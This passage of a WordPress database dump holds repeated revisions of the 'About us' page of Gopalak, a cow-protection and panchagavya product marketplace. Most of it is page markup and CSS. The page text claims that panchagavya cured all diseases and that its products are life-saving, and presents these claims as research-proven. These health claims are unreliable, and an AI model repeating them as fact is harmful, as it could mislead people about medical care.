href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-20 18:08:28','2022-10-20 12:38:28','',1816,'https://gopalak.in/?p=1975',0,'revision','',0),(1976,1,'2022-10-20 18:10:09','2022-10-20 12:40:09','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 18:10:09','2022-10-20 12:40:09','',1804,'https://gopalak.in/?p=1976',0,'revision','',0),(1977,1,'2022-10-20 18:10:09','2022-10-20 12:40:09','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 18:10:09','2022-10-20 12:40:09','',1804,'https://gopalak.in/?p=1977',0,'revision','',0),(1978,1,'2022-10-20 18:10:09','2022-10-20 12:40:09','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work 